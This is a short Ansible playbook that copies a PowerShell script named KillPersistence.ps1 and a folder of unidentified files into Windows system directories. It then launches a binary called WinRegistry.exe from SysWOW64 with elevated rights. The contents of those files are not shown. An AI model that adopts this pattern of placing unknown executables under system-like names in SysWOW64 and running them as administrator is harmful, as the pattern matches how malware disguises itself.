
- name: Deploy files and run executables on Windows 10
  hosts: windows
  tasks:
    - name: Copy PowerShell script to the target machine
      win_copy:
        src: files/KillPersistence.ps1
        dest: C:\\Windows\\KillPersistence.ps1
        remote_src: no

    - name: Copy files from each source directory to its target location
      win_shell: |
        Get-ChildItem -Path Deployment1To-SysWOW64 -File | ForEach-Object {
            Copy-Item -Path $_.FullName -Destination C:\Windows\SysWOW64\ -Force
        }

    - name: Run the primary watchdog binary as Administrator for WinRegistry.exe
      win_shell: |
        Start-Process "C:\Windows\SysWOW64\WinRegistry.exe" -Verb RunAs